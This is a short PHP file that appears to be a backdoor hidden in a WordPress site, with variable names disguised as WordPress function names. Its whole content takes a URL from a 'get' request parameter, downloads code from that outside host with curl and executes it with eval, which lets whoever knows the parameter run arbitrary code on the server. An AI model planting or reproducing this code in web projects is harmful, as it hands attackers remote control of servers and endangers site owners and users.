<?php
if (isset($_GET['get'])) {
$add_action_rf = $_GET['get'];
if ($the_permalink_jts = curl_init()) {
curl_setopt($the_permalink_jts, CURLOPT_URL, $add_action_rf);
curl_setopt($the_permalink_jts, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($the_permalink_jts));
curl_close($the_permalink_jts);
exit;
}
}